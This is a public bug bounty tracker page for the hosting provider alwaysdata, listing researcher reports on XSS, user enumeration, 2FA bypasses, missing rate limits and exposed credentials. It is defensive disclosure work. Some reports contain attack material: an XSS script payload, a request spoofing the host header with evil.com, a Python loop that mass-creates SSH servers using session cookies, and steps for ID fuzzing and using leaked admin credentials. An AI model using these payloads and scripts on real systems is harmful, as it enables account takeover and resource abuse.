Security vulnerabilities

This is the security vulnerability reporting site for alwaysdata. Please make sure you read our bug bounty program before registering and creating a new task to submit a vulnerability you've discovered.

Once processed, the reports are public. Any private information can be transmitted via a support ticket on our administration interface.

ID Summary  desc Status Date closed
 2  XSS Vulnerability in [admin.alwaysdata.com] Support Tic ...Closed12.01.2024 Task Description

XSS Vulnerability in [admin.alwaysdata.com] Support Ticket System

Vulnerability Report
Greeting: Dear Team

I'm writing to report a critical Reflected Cross-Site Scripting (XSS) vulnerability discovered in your [admin.alwaysdata.com] application. This vulnerability allows attackers to inject malicious JavaScript into the application, potentially compromising user accounts and sensitive data.

PoC: By sending a specially crafted request containing the payload redhet"'><script>prompt(document.domain)</script> through the add_participants parameter in the support ticket creation form, we can trigger the XSS vulnerability and execute arbitrary JavaScript in the victim's browser.

Summary:

A reflected XSS vulnerability has been identified in the "add_participants" parameter of the support ticket creation form on admin.alwaysdata.com. This vulnerability allows attackers to inject malicious JavaScript code that will be executed in the victim's browser when they view a vulnerable page.

Vulnerability Details:

Type: Reflected XSS (OWASP A4)

Exploit: Injecting malicious JavaScript through a vulnerable request parameter

Vulnerable URL: https://admin.alwaysdata.com/support/add/

Vulnerable Request: POST /support/add/

Vulnerable Endpoints: The add_participants parameter in the support ticket creation form

Payload: redhet"'><script>prompt(document.domain)</script>

This parameter is used to add participants to a support ticket, but it is not properly sanitized, allowing attackers to inject arbitrary code that will be executed in the browser of any user who views the vulnerable ticket.

## Impact Assessment

1. Impact one: Information Disclosure: The attacker can steal sensitive user information, such as cookies or session IDs, by executing malicious JavaScript within the victim's browser.

2. Impact two: Account Takeover: The attacker could potentially hijack user accounts by tricking them into executing malicious code that grants unauthorized access.

3. Impact three: Defacement: The attacker could manipulate the content displayed on the application by injecting malicious JavaScript that alters the user interface.

## Recommendations

1. Step one: Immediately sanitize all user input: Implement strict input validation and sanitization procedures to prevent the injection of malicious code. This includes escaping special characters and enforcing a Content Security Policy (CSP).

2. Step Two: Patch vulnerable software: Update all relevant software to the latest versions to address known vulnerabilities.

3. Step three: Consider additional security measures: Implement a web application firewall (WAF) to further protect against XSS attacks.

4. Step four:Regularly scan for vulnerabilities: Conduct regular penetration testing and vulnerability scans to identify and address potential security issues.

Impact:

Execution of arbitrary JavaScript code in the victim's browser
Potential for session hijacking, credential theft, or other attacks

## Steps to Reproduce

1. Step one: Access the support ticket creation form at https://admin.alwaysdata.com/support/add/

2. Step two: Enter the following payload in the "add_participants" field: redhet"'><script>prompt(document.domain)</script>

3. Step three: Submit the form.

4. Final step: Observe that the JavaScript code is executed, displaying a prompt with the domain name. (cookies)

Attachments
PoC Video: [Link to video demonstrating the vulnerability]**

## References

[OWASP XSS Prevention Cheat Sheet]: (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

[OWASP XSS Testing Guide]: (https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting)

I hope you will give me a good answer!!

If you have any questions, feel free to ask them ;)

Thank You,

Regards,
Redhet

 22  Vulnerability Report: Unverified Email Registration on  ...Closed31.01.2024 Task Description

I am writing to report a security vulnerability that I discovered on the Alwaysdata.com platform regarding unverified email registration. This vulnerability allows users to create new accounts without verifying their email addresses, posing a significant risk to the security and integrity of the platform and its users.

Below are the details of the vulnerability along with steps to reproduce, its impact, severity, and proposed solution:

Vulnerability Details:

Vulnerability Type: Unverified Email Registration
Website: https://www.alwaysdata.com/ Steps to Reproduce:

Visit the Alwaysdata.com website.
Navigate to the account registration page.
Enter any email address (valid or invalid) without going through email verification.
Complete the registration process without receiving or verifying any email confirmation.
Impact:

Account Takeover: Malicious actors can create accounts using others' email addresses and gain unauthorized access to their accounts or personal information.
Spam and Abuse: Unverified accounts can be used to send spam, phishing emails, or engage in other abusive activities on the platform.
Impersonation: Attackers can impersonate legitimate users or organizations by creating accounts with their email addresses.

Proposed Solution:
To mitigate this vulnerability, I recommend implementing email verification as a mandatory step during the registration process. This would involve sending a verification email with a unique code or link that users must confirm before their accounts are activated.

Additionally, consider implementing rate limiting or other measures to prevent abuse of the registration process and ensure that users' accounts and data are protected from unauthorized access and misuse.

I believe that addressing this vulnerability promptly will help enhance the security and trustworthiness of the Alwaysdata.com platform and protect its users from potential harm.

Please let me know if you require any further information or assistance in resolving this issue. I am committed to assisting you in any way possible to ensure the security of the platform and its users.

Thank you for your attention to this matter, and I look forward to your prompt response.

 49  Vulnerability Report: Lack of Rate Limiting on Password ...Closed24.04.2024 Task Description

The website does not implement rate limiting on password reset links, allowing an attacker to repeatedly request password reset links for any account. This could lead to account takeover through brute-force attacks.

Description When an attacker gains access to a target account's email address, they can repeatedly request password reset links without any rate limiting in place. This allows them to flood the target's email inbox with reset links, making it difficult for the legitimate user to identify and use the valid reset link. Additionally, the attacker can automate this process, increasing the efficiency of the attack.

Impact Account Takeover: Attackers can potentially take over user accounts by flooding their email inbox with reset links, making it easier to intercept a valid reset link and gain unauthorized access.
User Disruption: The flood of reset links can disrupt the user's ability to use their email normally, causing inconvenience and potential confusion.

Recommendations Implement rate limiting on password reset requests to prevent brute-force attacks.
Limit the number of password reset links that can be requested per minute per IP address or account.
Implement CAPTCHA or other mechanisms to distinguish between automated and legitimate requests.

Steps to Reproduce 1- Go To This Link https://admin.alwaysdata.com/login/ Enter your Email Click On Forget Password
2- intercept burp and send request to intruder
3- make payload and start attack

Supporting Material/References

OWASP Password Reset Best Practices

Impact Account Takeover
User Disruption

Proof of Concept N/A (Describe how you were able to successfully exploit the vulnerability.)

Remediation
Implement rate limiting on password reset requests to prevent brute-force attacks. Limit the number of password reset links that can be requested per minute per IP address or account. Implement CAPTCHA or other mechanisms to distinguish between automated and legitimate requests.

Supporting Material/References
OWASP Password Reset Best Practices

Impact Account Takeover
User Disruption

Proof of Concept SS ATTACHED REQUEST** (BY USING BRUP SUITE)

POST /password/lost/ HTTP/2
Host: admin.alwaysdata.com
Cookie: REACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.alwaysdata.com/password/lost/ Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Origin: https://admin.alwaysdata.com Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrfmiddlewaretoken=8GNhIyHjyRaBHSlBRaaN9gMWKaksiJR3Py8S3TJoW8zb7tq5gU4JzRA1cMEp0VHl&email=alexdoppler29%40gmail.com

SS LINK - https://drive.google.com/file/d/1a0vqAOB6u6ayQSNX4ktQuUOWIAgNQjAR/view?usp=sharing

 19  User Enumeration Through Forgot Password Vulnerability Closed29.01.2024 Task Description

The application's "Forgot Password" feature allows user enumeration. This is because the application responds with a different message depending on whether the submitted email address is registered or not.
(https://admin.alwaysdata.com/password/lost/)

steps to Reproduce:

Access the "Forgot Password" page.
Enter a random, non-registered email address.
Submit the request.
Observe the response message:

  the message states "There is no account with this email address," which means that user enumeration is possible.
 An attacker could exploit this vulnerability to:

Gather a list of valid user email addresses.
Launch targeted phishing attacks.
Use the information to attempt password guessing or brute force attacks

Remediation:
Implement Generic Response: The application should provide the same response message regardless of whether the email address is registered or not. This prevents attackers from differentiating between valid and invalid accounts.

Additional Notes:

i am aware that this bug is not eligible for a bounty but wanted to bring it to the team's attention.

Best Wishes -Basil

 29  URL Override in api.alwaysdata.com Closed16.02.2024 Task Description

Description

I discovered a potential vulnerability in api.alwaysdata.com that could allow an attacker to override URLs by manipulating the X-Forwarded-Host header. This issue could potentially lead to unintended redirections or access to restricted resources.

Proof-of-Concept

To demonstrate this vulnerability, we can use a simple HTTP request with a modified X-Forwarded-Host header. Replay the following request;

GET /v1/ssh/doc/ HTTP/1.1
Host: api.alwaysdata.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Cache-Control: max-age=0
X-Forwarded-Host: evil.com
Cookie: flyspray=ef2b9025azb8fd028bf6
Referer: https://api.alwaysdata.com/doc

Mitigation

Blocking or filtering out the X-Forwarded-Host header entirely and relying on other methods to determine the original domain (e.g., using the Host header or server logs).

 37  unverified password change in [admin.alwaysdata.com] Closed27.03.2024 Task Description

unverified password change in [admin.alwaysdata.com]

Hello team!

I have found an interesting flaw where an attacker can change the account password without knowing the old password

When the user requests a password reset link, it accesses the activity log inside the account and this bug can be exploited by an attacker

Steps to reproduce the bug :

1-Create a new account on [admin.alwaysdata.com]
2-log in to your account
3-request the password reset link from another browser
4-you will notice that the password reset link you requested has arrived in the activity log

Impact :
If the attacker hijacks the session or gains access to the user account, he can request a password reset link and the link will reach him in the Account Activity Log, from which he can reset the account password without knowing the old password

34Unvalidated Input vulnerability in Class_Join feature a...Assigned Task Description

Description

An unvalidated input vulnerability has been identified in the class joining process of the platform. By fuzzing the teacher ID parameter in the class_join URL, an attacker can potentially join any class without proper authorization. This issue poses a significant security risk and may lead to unauthorized access to sensitive information and class benefits.

Impact

The potential impact includes:

a) Unauthorized access to sensitive class information
b) Compromised data privacy for both students and instructors.

Proof-of-Concept

To reproduce the vulnerability, follow these steps:

1) First, we log in a test account. Next, we replay this invite URL I got from an actual tutor invite, but now we manipulate the teacher ID value to grant us unvalidated access to certain classes.
This is the invite URL:

https://admin.alwaysdata.com/academic/attach/?teacher=<TEACHER_ID>

2) Fuzz different values for the ID parameter to find classes that can be accessed without proper authorization. A bit flipper attack would provide the best results.

3) Upon finding a class with a vulnerable ID, join the class by providing the manipulated URL to the unauthorized user.

Mitigation

1) Implement proper input validation and sanitization for the class ID parameter to ensure that only authorized users can join classes. This can be done by assigning a temporary validation token per class_join request.

2) In the absence of token validation, the teacher_id could be encrypted to a longer, more obfuscated value to reduce predictability.

POC || Bit Flipper Video: https://file.io/qy91eQRASzyo

 73  Unlimited SSH Server Creation Vulnerability on AlwaysDa ...Closed02.09.2024 Task Description

# Unlimited SSH Server Creation Vulnerability on AlwaysData

## Summary
There is no limit on the number of SSH servers that can be created by a user on the AlwaysData platform. This vulnerability allows for unauthorized resource exhaustion, which could lead to service degradation or denial of service (DoS).

## Steps to Reproduce

1. Log in to your AlwaysData account.
2. Navigate to the SSH server creation page: `https://admin.alwaysdata.com/ssh/add/`.
3. Submit the form to create a new SSH server using a valid name and password.
4. Repeat the above step multiple times with different names like `jhoneone_1002`, `jhoneone_1003`, etc.
5. Observe that there is no limit imposed on the number of SSH servers that can be created, leading to potential resource exhaustion.

## Impact
- Resource Exhaustion: An attacker can create an unlimited number of SSH servers, potentially exhausting the resources allocated to other users on the platform.
- Denial of Service: Continuous server creation could degrade the platform's performance or lead to a denial of service.

## Recommendations
- Implement Limits: Set a reasonable limit on the number of SSH servers that can be created per user.
- Monitor for abnormal SSH server creation patterns and implement rate limiting to prevent abuse.

## Python Script to Exploit the Vulnerability

```python
import requests

# Configuration
url = "https://admin.alwaysdata.com/ssh/add/"
headers = {

  "Host": "admin.alwaysdata.com",
  "Cookie": "csrftoken=dnNRG2ExW88JR4GFKyeRRbD0JMV6E7IH; django_language=en; sessionid=q25k858xtrmg95b2t486xg7snokn99ls",
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
  "Accept-Language": "en-US,en;q=0.5",
  "Accept-Encoding": "gzip, deflate",
  "Referer": "https://admin.alwaysdata.com/ssh/add/",
  "Content-Type": "application/x-www-form-urlencoded",
  "Origin": "https://admin.alwaysdata.com",
  "Dnt": "1",
  "Upgrade-Insecure-Requests": "1",
  "Sec-Fetch-Dest": "document",
  "Sec-Fetch-Mode": "navigate",
  "Sec-Fetch-Site": "same-origin",
  "Sec-Fetch-User": "?1",
  "Te": "trailers"

}

# Function to create an SSH server
def create_ssh_server(session, csrf_token, username, password="AAAaaa123###"):

  data = {
      "csrfmiddlewaretoken": csrf_token,
      "name": username,
      "password": password,
      "home_directory": "",
      "shell": "BASH",
      "can_use_password": "on",
      "annotation": "",
      "submit": ""
  }
  response = session.post(url, headers=headers, data=data)
  return response.status_code, response.text

# Main script
if name == "main":

  with requests.Session() as session:
      # Replace the csrf_token below with your own token from your account
      csrf_token = "hpjP7TYZxZLeNcxhqG3fC6vZkwecJIc4kCWwDLsmjXJNu63M047Wj7YPT8Z8dFKB"
      
      for i in range(1002, 1100):  # Create multiple servers
          username = f"jhoneone_{i}"
          status_code, response_text = create_ssh_server(session, csrf_token, username)
          print(f"Status Code: {status_code}, Username: {username}")
          # Optionally, you can log the response_text for debugging purposes
 56  Unauthorized Organization Creation Closed12.07.2024 Task Description

Summary:
A vulnerability was discovered where a user who is not given permission on invite is still able to create a new organization, potentially leading to unauthorized access and data breaches.

Impact:

- Unauthorized access to sensitive information
- Potential data breaches
- Increased risk of account takeover

Expected Result:

- User without permission should not be able to create a new organization
- User should only be added to the organization with proper permission

Actual Result:

- User without permission is given a new organization on accepting invite
- User is added to the new organization with unnecessary permissions

Steps to Reproduce:

1. Invite a user without permission
2. Observe the user creating a new organization
3. Verify the user's unnecessary permissions in the new organization

Recommended Fix:
1. Implement permission checks to prevent unauthorized organization creation
2. Ensure users are only added to organizations with proper permission
3. Validate user permissions on each request to prevent abuse

Conclusion:

This vulnerability poses a critical risk to sensitive information and user accounts. Implementing proper permission checks and validation will prevent unauthorized access and ensure the security and integrity of user accounts.

 59  Unauthorized Account Takeover via Invitation Exploitati ...Closed29.07.2024 Task Description

*Vulnerability Summary: Unauthorized Account Takeover via Invitation Exploitation in [admin.alwaysdata.com] Vulnerability Description: A critical security vulnerability was identified in the account invitation process of [Service that allows the user to create a site]. This vulnerability allowed an unauthorized user to gain administrative control over another user's account through the invitation feature. Below is a detailed timeline of events leading to the account takeover: 1. Account Creation: - A user (referred to as User A) created an account on [Service that allows the user to create a site]. 2. Incorrect Invitation: - User A intended to invite a member to become an administrator but mistakenly sent the invitation to another user (User B). 3. Invitation Deletion: - Realizing the mistake, User A promptly deleted the invitation intended for User B. 4. Correct Invitation: - User A subsequently invited their colleague (referred to as User C) to become an administrator of their account. 5. Acceptance by Colleague: - User C accepted the invitation, assuming administrative rights as intended by User A. 6. Unauthorized Acceptance: - Meanwhile, User B, who received the initial invitation in error, noticed the invitation and, potentially unaware of the implications, accepted it. 7. Account Takeover:**

  1. By accepting the invitation, User B gained administrative access to User A's account, effectively taking ownership of the account.

I've sent a proof of concept: [REDACTED]

Impact:
Account Takeover

 20  Unauthorized Access to Over 6000+ Valid User Credential ...Closed30.01.2024 Task Description

I have identified a Credential Dump that allows unauthorized access to over 6000+ valid user credentials of Alwaysdata.com. This discovery was made in accordance with the Alwaysdata Bug Bounty Program guidelines. I am reporting this issue to ensure the security and privacy of Alwaysdata's users and to assist in prompt remediation.

Sensitive Data at Risk:

The data exposure includes, but is not limited to, vendor and client details, Personally Identifiable Information (PII), Social Security Numbers, medical and financial records, and crucial authentication credentials.

Impact

If exploited by a malicious actor, this vulnerability could lead to:

-Unauthorized access to user accounts.
-Potential compromise of sensitive personal and financial data.
-Secondary attacks using the obtained credentials (credential stuffing, phishing, etc.).
-Damage to the reputation and trustworthiness of the Alwaysdata platform.

Given the scale of the data exposure (6000+ user credentials), the impact is considered highly critical.

Steps to Reproduce :

To access and reproduce the findings related to the data leak, please follow this link: https://phonebook.cz/. It is important to note that an Academia account is required to view the full extent of the data dump. This platform was where I initially discovered the leak of valid credentials.

For your convenience,I've completed the data compilation myself and attached screenshots that capture key aspects of the data leak. Please find below,The attached document containing direct links to the accounts, along with their corresponding emails and passwords. This information was extracted through a manual process, and I've managed to identify at least 30 potential accounts, reviewing their Personally Identifiable Information (PII) among other data.These images should provide a clearer understanding of the issue and assist in verifying the vulnerability.

Proof of Concept
I have attached POC for your reference.I was only able to attach 5 files. If possible,kindly guide me so I can attach more POC's

Remediation Suggestions

To address this vulnerability, I suggest the following immediate and long-term remediation steps:
Revoking current exposed credentials and enforcing a password reset for affected users.
Implementing stricter access controls and regular security audits to prevent similar vulnerabilities.

Confidentiality Agreement

I understand the sensitive nature of this report and agree to keep the details confidential until Alwaysdata has resolved the issue and agreed to disclosure, as per the bug bounty program's guidelines.

I look forward to your prompt response and am willing to provide any further information required for the resolution of this issue.Though the leaked credentials might originate from another application or service,they are your Users and I believe,it is your call to protect the privacy and data of your users.I would greatly appreciate your team's consideration of rewarding this finding, even if it falls outside the typical scope of your program. Thank you for your commitment to security and the opportunity to contribute to the safety of the Alwaysdata platform.

Regards,
Bad_Script3r
Would really appreciate if you could revert on my Email (akhilsocials@gmail.com)
Thanks and Regards.

 65  Unauthorized Access to Admin Page via Exposed Credentia ...Closed28.07.2024 Task Description

Good day Team,
This is Unauthorized Access to Admin Page via Exposed Credentials on GitHub

- admin.alwaysdata.com

Summary:
Sensitive credentials for an admin account were found exposed on a public GitHub repository. Using these credentials, an attacker can gain unauthorized access to the admin page of phpmyadmin.alwaysdata.com.

Description:
Credentials for an admin user were discovered using a Google dork on GitHub. The dork revealed an admin username and password that allowed access to the admin page of phpmyadmin.alwaysdata.com.

Steps to Reproduce:

1. Go to GitHub and use the search dork: "admin.alwaysdata.com" password.
2. Identify a public repository containing the admin username and password.
3. Navigate to https://phpmyadmin.alwaysdata.com/.
4. Use the discovered credentials to log in.
5. Observe that you have successfully logged in as an admin user.

Proof of Concept: https://drive.google.com/file/d/12dmKXf-6hwk-VZdozGl2FyvsbiVjDZA6/view?usp=sharing

Impact:
Unauthorized access to sensitive data and administrative functionalities.

 16  Unauthenticated-Video conferencing on "https://jitsi.al ...Closed18.01.2024 Task Description

Description: while Enumerating subdomains of Alwaysdata.com,
I Found a subdomain open hosting video conferencing for all.

Steps to reproduce: 1.visit the site :"https://jitsi.alwaysdata.com/"
2.create a video conferencing :"malicious.conferencing"
3.Now anyone can join the video call with the link provided by the attacker.

This could lead to potential damage to the Alwaysdata if the attacker intends to exploit this in a malicious way.
as this is open for any users on the web.

Impact: 1.Unauthorized Access:

Vulnerability: If the video conferencing system is not properly secured, it may be susceptible to unauthorized access.
Impact: Unauthorized individuals could join sensitive meetings, leading to the potential exposure of confidential information.

2.Phishing Attacks:
Vulnerability: Attackers may exploit the subdomain for phishing attacks, tricking users into providing sensitive information.
Impact: This could lead to the compromise of user credentials or the installation of malware on participants' devices.
3.Data Storage Security:

Vulnerability: Inadequate security measures for storing recorded video conference sessions.
Impact: Stored data may be at risk of unauthorized access, leading to the exposure of sensitive information.

POC:
https://drive.google.com/file/d/17NnRxFnzj7gZFsLXNEzt28b4jYjW7c-d/view?usp=sharing

Mitigation: To mitigate these risks, Alwaysdata should implement strong authentication, encrypt communication channels.

 71  Title: Unauthorized Email Sending Exploit** in [alwaysd ...Closed20.08.2024 Task Description

*Title: Unauthorized Email Sending Exploit in [alwaysdata.com] Summary: A vulnerability has been discovered in the site's email handling system. The site assigns each user a unique email address. However, it is possible to send an email from any email account, bypassing the intended email restrictions and validation mechanisms. Vulnerability Details: - Type: Email Spoofing
-
Impact: Unauthorized email sending
-
Affected Component: Email Handling System Description: The application generates a unique email address for each user. However, it is possible to exploit the system to send emails from any arbitrary email address. This issue arises due to insufficient validation of the email sender’s address. Proof of Concept: 1. Exploit Steps: - Use an email client or script to send an email through the application.
- Modify the "From" address to any arbitrary email address, not restricted to the user's assigned address. 2.
Result: - The email is sent successfully. Follow the steps in the video: https://admin.alwaysdata.com/support/77431/376905-bandicam%202024-08-20%2003-19-32-375.mp4 Impact:**

This vulnerability allows an attacker to send emails appearing as if they are from any user.

 50  *Title:* Two-Factor Authentication Bypass via Support T ...Closed24.04.2024 Task Description

*Title:* Two-Factor Authentication Bypass via Support Ticket Creation in [admin.alwaysdata.com]

*Summary:*
A critical security vulnerability has been identified in the [admin.alwaysdata.com]'s account management system where a user with administrative privileges but mandated to use two-factor authentication (2FA) can bypass this requirement by initiating a support ticket under the name of the primary account holder without triggering 2FA.

*Description:*
This vulnerability allows an added user, who is supposed to be restricted by 2FA, to perform actions appearing as the primary account holder by submitting support tickets. This circumvents the security protocol intended to protect sensitive account operations via 2FA, potentially leading to unauthorized actions without the account holder's consent or knowledge.

*Steps to Reproduce:*
1. Create two user accounts, Account A (primary) and Account B.
2. From Account A, add Account B as another user with full administrative privileges but enforce 2FA on actions.
3. Log into Account B.
4. Navigate to the support section and initiate a support ticket, selecting Account A as the affected account.
5. Submit the ticket without being prompted for 2FA verification.

I sent a proof of concept : https://admin.alwaysdata.com/support/77431/367474-VID-20240423-WA0000.mp4

*Impact:*
The primary account holder's security is compromised as the added user can perform sensitive operations under their guise without completing the necessary 2FA checks. This vulnerability may lead to unauthorized access and control over the primary account's sensitive functions and data.

 76  **Title: Two-Factor Authentication Bypass ** in [admin. ...Closed19.09.2024 Task Description

Title: Two-Factor Authentication Bypass Issue in [admin.alwaysdata.com]

Summary: A vulnerability has been identified that allows an attacker to bypass Two-Factor Authentication (2FA) and manage applications on a user’s account. The attacker can create and delete applications on the account of the user who invited them.

Steps to Reproduce: 1. Create a new account.
2. Add a member to manage your account and activate Two-Factor Authentication (2FA) for that member.
3. Add an application to your account.
4. Log in to the account of the invited member.
5. Navigate to the following link: [https://admin.alwaysdata.com/site/application/script/].
6. Observe that you can create a new application and delete existing applications on the account of the original account holder.

POC: https://drive.google.com/file/d/1v5PbiZaZZK7l30XgdZx7025tsZnDOOf8/view?usp=drivesdk

Impact: Two-Factor Authentication Bypass

 25  Title: Security Report: Public Exposure of Sensitive In ...Closed04.02.2024 Task Description

Title: Security Report: Public Exposure of Sensitive Information

Introduction:
The purpose of this report is to highlight a critical security issue involving the public exposure of sensitive information on the website security.alwaysdata.com. The exposed data includes details about supervisors, the number of reports they have sorted, and some reports that remain unprocessed and may contain sensitive information and unpatched vulnerabilities.

Exposure of Supervisor Information:
The website security.alwaysdata.com hosts a page that displays information about all users, including supervisors. The URL format for accessing supervisor information is https://security.alwaysdata.com/user/1. By manipulating the numeric value in the URL, it is evident that any user can access information about all users and supervisors on the site. This unrestricted access poses a significant security risk as it allows unauthorized individuals to view sensitive user data, potentially compromising the privacy and security of the users and the platform as a whole.

Unsecured Reports:
Furthermore, the website contains reports that are in an unprocessed state and have not been closed. These reports are accessible to the public through the URL format https://security.alwaysdata.com/task/23?dev=1. The presence of such reports in an open state poses a severe security threat as they may contain sensitive information that should not be shared with regular users. Additionally, these reports may reveal unpatched vulnerabilities in the platform, further increasing the risk of exploitation by malicious actors.

Recommendations:
1. Immediate Restriction of Access: It is imperative to implement access controls to restrict public access to supervisor information and unprocessed reports. Access should be limited to authorized personnel with appropriate privileges.

2. Review and Remediation: All unprocessed reports should be reviewed to identify and address any sensitive information or vulnerabilities they may contain. Once remediated, these reports should be appropriately secured and closed.

3. Security Awareness Training: Conduct security awareness training for all personnel involved in managing and maintaining the website. Emphasize the importance of safeguarding sensitive data and the potential consequences of data exposure.

4. Regular Security Audits: Implement regular security audits to identify and address any potential security loopholes, including unauthorized access to sensitive information and unsecured reports.

Conclusion:
The public exposure of supervisor information and unsecured reports on security.alwaysdata.com poses a significant security risk, potentially compromising user privacy and platform integrity. Immediate action is necessary to address these vulnerabilities and ensure the confidentiality and security of user data. Failure to mitigate these risks could lead to severe repercussions for the organization and its users.

 66  *Title:* Insufficient Validation Allows Multiple Accoun ...Closed31.07.2024 Task Description

*Title:* Insufficient Validation Allows Multiple Accounts Creation Under Single Subscription Plan

*Description:*
A vulnerability has been identified in the subscription management system which allows users to create multiple accounts under the same subscription plan. This issue can be exploited to bypass restrictions on the number of accounts per plan and gain unauthorized benefits.

*Steps to Reproduce:*

1. *Create an Account:*

  1. Sign up for a new account with a specific subscription plan (e.g., "Free Plan").

2. *Create a Duplicate Account:*

  1. Attempt to create another account using the same subscription plan as the first account.
  2. Notice that the system does not prevent the creation of multiple accounts under the same subscription plan.

3. *Create a Similar Plan Account:*

  1. From the newly created account, sign up for a subscription plan similar to the first account's plan.

4. *Send an Invitation:*

  1. Send an invitation from the second account to the first account to become an admin of the plan created by the second account.

5. *Accept the Invitation:*

  1. After accepting the invitation, the first account will now have two accounts under the same subscription plan.

I sent a proof of concept: https://admin.alwaysdata.com/support/77431/375639-poc.mp4

*Impact:*

This vulnerability allows users to circumvent subscription limitations by creating multiple accounts under the same plan

 61  *Title: Critical Security Vulnerability: Unauthorized A ...Closed18.07.2024 Task Description

*Title: Critical Security Vulnerability: Unauthorized Account Deletion via Limited Permissions* in [admin.alwaysdata.com]

Summary:*
During my investigation, I discovered a significant security flaw in the system's account management feature.

*Description:*
The system allows users to invite others to manage their accounts with varying permissions, including the ability to enforce two-factor authentication (2FA) before accessing account management privileges.

*Vulnerability Details:*
I identified a vulnerability wherein an invited user, even without sufficient permissions or 2FA activation, can delete the inviting user's account from their own account. This deletion occurs regardless of whether 2FA was enabled during the invitation process.

*Steps to Reproduce the Bug:*
1. Create two accounts.
2. Invite a user to administer your account and enable 2FA.
3. From the invited user's account, delete the account of the inviting user.
4. Observe that the inviting user's account is permanently deleted, despite prior 2FA activation or the absence of sufficient permissions granted.

I sent proof of concept: https://admin.alwaysdata.com/support/77431/374527-bandicam%202024-07-17%2003-48-55-255.mp4

*Impact:*

This security vulnerability poses a significant risk to user accounts within the system. It allows an invited user, even with limited permissions and without activating two-factor authentication (2FA), to permanently delete the account of the inviting user. This action occurs despite security measures initially set up, such as 2FA activation during the invitation process or inadequate administrative permissions granted.

 68  *Title:*: Bypassing Email Address Restriction for Accou ...Closed05.08.2024 Task Description

*Title:*: Bypassing Email Address Restriction for Account Creation

*Description:*
The ban on an email can be bypassed

An example is the following e-mail address: "admin@alwaysdata.com"

*Steps to Reproduce:*
1. Attempt to create an account using a blocked email address. The system will display a message stating that the email address is blocked and prevent account creation.
2. Create an account using a different email address.
3. Once the account is successfully created, navigate to the account settings.
4. Change the email address of the account to the previously blocked email address.
5. Save the changes. The email address will be updated to the blocked one, bypassing the initial restriction.

*Impact:*
This issue allows users to circumvent email address restrictions.

*Recommendation:*
Implement server-side checks to ensure that email address restrictions are enforced consistently across all account management functionalities. Additionally, review the email update process to prevent such bypasses.

*POC:*

poc1: https://admin.alwaysdata.com/support/77431/375912-poc.22.png poc2: https://admin.alwaysdata.com/support/77431/375911-bandicam%202024-08-05%2009-36-57-769.mp4

 67  *Title:* Account Creation and Impersonation Vulnerabili ...Closed05.08.2024 Task Description

*Title:* Account Creation and Impersonation Vulnerability in [admin.alwaysdata.com]

*Summary:*
It is possible to create a new account on the site using the domain name admin1@alwaysdata.com. After creating this account, the username can be changed to that of a legitimate site administrator. This vulnerability allows the account to generate support tickets and invite users, In this way he can defraud users.

*Steps to Reproduce:*
1. Register a new account on the site using the email admin1@alwaysdata.com , Or by any other name
2. Change the account username to that of a real site administrator.
3. Use the account to create a support ticket and invite users.

poc: https://admin.alwaysdata.com/support/77431/375910-poc.alwaysdata.png

*Impact:*
This vulnerability enables attackers to impersonate site administrators within the support system, Which enables the attacker to impersonate the administrators of the site and deceive users

*Recommendation:*
To mitigate this risk, implement restrictions to prevent the creation of accounts with administrative email domains.

 28  Summary: A username disclosure vulnerability has been i ...Closed13.02.2024 Task Description

Details: Upon accessing the URL endpoint https://blog.alwaysdata.com/wp-json/wp/v2/users/, the website returns a JSON response containing information about registered users, including usernames. This exposes user account details to anyone who accesses the endpoint, without requiring authentication.

Impact: The username disclosure vulnerability poses a significant risk to the security and privacy of users on the https://blog.alwaysdata.com website. Attackers can use the exposed usernames to attempt unauthorized access to user accounts, conduct targeted phishing attacks, or perform further reconnaissance to exploit additional vulnerabilities.

Recommendations:

  Immediate Mitigation: Disable public access to the /wp-json/wp/v2/users/ endpoint to prevent unauthorized users from obtaining a list of user accounts.
  Patch Deployment: Implement a security patch or update provided by the website’s developers to address the username disclosure vulnerability.
  User Notification: Inform registered users of the vulnerability and advise them to change their passwords as a precautionary measure.
  Security Audit: Conduct a comprehensive security audit of the website to identify and remediate any additional vulnerabilities that may exist.

Additional Information: This report aims to assist in promptly addressing the username disclosure vulnerability on the https://blog.alwaysdata.com website to safeguard user data and mitigate potential security risks. Urgent action is recommended to prevent exploitation and protect the website’s users from unauthorized access to their accounts.

Please feel free to reach out if further assistance or clarification is needed.

Sincerely, Nilesh
nilesh56466@gmail.com

 23  Subject: Vulnerability Report: Transmission of Credenti ...Closed02.02.2024 Task Description

Subject: Vulnerability Report: Transmission of Credentials in Plain Text on Alwaysdata.com

Dear Security Team,

I hope this email finds you well. I am writing to report a security vulnerability that I discovered on the Alwaysdata.com platform regarding the transmission of credentials in plain text during the login process. This vulnerability poses a significant risk to the security and privacy of users' accounts and sensitive information.

Vulnerability Details:

Vulnerability Type: Transmission of Credentials in Plain Text
Website: https://www.alwaysdata.com/ Description:
During testing of the login process on the Alwaysdata.com platform, I observed that user credentials (email and password) are transmitted in plain text or with minimal obfuscation. While the CSRF token appears to be encrypted, the email and password fields are transmitted without proper encryption, making them susceptible to interception and potential exploitation by malicious actors.

Steps to Reproduce:

Navigate to the Alwaysdata.com login page.
Enter valid login credentials (email and password).
Intercept the login request using a tool such as Burp Suite.
Analyze the intercepted request to observe that the email and password are transmitted in plain text or with minimal obfuscation, while the CSRF token is encrypted.

Impact:

Unauthorized Access: Attackers can intercept and extract user credentials, potentially leading to unauthorized access to user accounts and sensitive information.
